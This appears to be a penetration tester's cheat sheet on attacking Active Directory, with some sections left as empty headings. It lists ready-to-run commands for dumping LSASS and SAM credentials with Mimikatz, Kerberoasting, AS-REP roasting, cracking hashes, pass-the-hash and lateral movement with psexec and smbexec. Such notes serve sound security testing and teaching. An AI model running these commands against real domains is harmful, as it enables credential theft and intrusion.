Active Directory
When testing active directory our goals should be to:
gain a foothold on a machine on the domain and elevate our privileges
enumerate the domain to find additional accounts, users, etc. that ideally increase our privilege level on the domain
gain access to the domain controller
persist on the domain (situation dependent)
Assuming that we've already enumerated the domain, we should now be focused on gathering credentials to move laterally within the domain.
Cached credential retrieval
Once you have local admin privileges on a domain joined computer you can dump the credentials stored in LSASS and the SAM database.
Mimikatz
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords (dump lsass)
lsadump::sam (dump sam database)
sekurlsa::tickets (to dump tickets stored in memory)
kerberos::list (view cached kerberos tickets for the current user)
Attacks
Kerberoasting
If we find interesting service accounts while enumerating we can export the Kerberos 5 etype 23 hash for offline cracking.
Extracting SPN hashes
crackmapexec ldap $ldapIPaddress -u user -p pass --kerberoasting output.txt
kerberos::list /export
Crack
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
hashcat -m 13100 hash.txt /path/to/wordlist -o output.txt
Alternatively, we can use the Invoke-Kerberoast.ps1, to enumerate SPNs, request tickets, and export them in a format ready for cracking.
AS-REP Roasting
The AS-REP roasting attack attempts to retrieve the Kerberos hash of users that don't require Kerberos pre-authentication.
Searching for AS-REP Roastable users
crackmapexec ldap $ldapIPaddress -u user -p 'pass' --asreproast output.txt
GetNPUsers.py domain/user:pass -dc-ip ipaddress -request format john -output.txt
Crack
john --format:krb5asrep output.txt
hashcat -m 18200 hash.txt /path/to/wordlist -o output.txt
Unconstrained delegation
Constrained delegataion
DCSync
Lateral movement
Moving laterally within a domain is fairly straightforward once you have credentials.
Windows remote management
winrs -remote:hostname -u:username -p:password (command)
PS-Remoting
**
PS-EXEC
psexec.py domain/user:password@ipaddress
SMB-EXEC
smbexec.py username:password@ipaddress
Pass the hash
Pass the hash allows attackers to authenticate to a remote system using an NTLM hash.
Passing-the-hash Toolkit
pth-winexe -U Administrator%$LMHash:$NTLMHash //$ipaddress cmd
Mimikatz
privilege::debug
sekurlsa::pth /user:Administrator /domain:test.local /ntlm:$hash
SMBclient
smbclient.py -hashes LMHash:NTLMHash domain/user@$ipaddress
PS Exec
psexec.py -hashes :NTLMhash administrator@ipaddress
Overpass the hash
The overpass the hash technique utilizes the NTLM hash to obtain a Kerberos ticket, thus avoiding NTLM authentication.
Pass the ticket
Persistence
Golden tickets
Last updated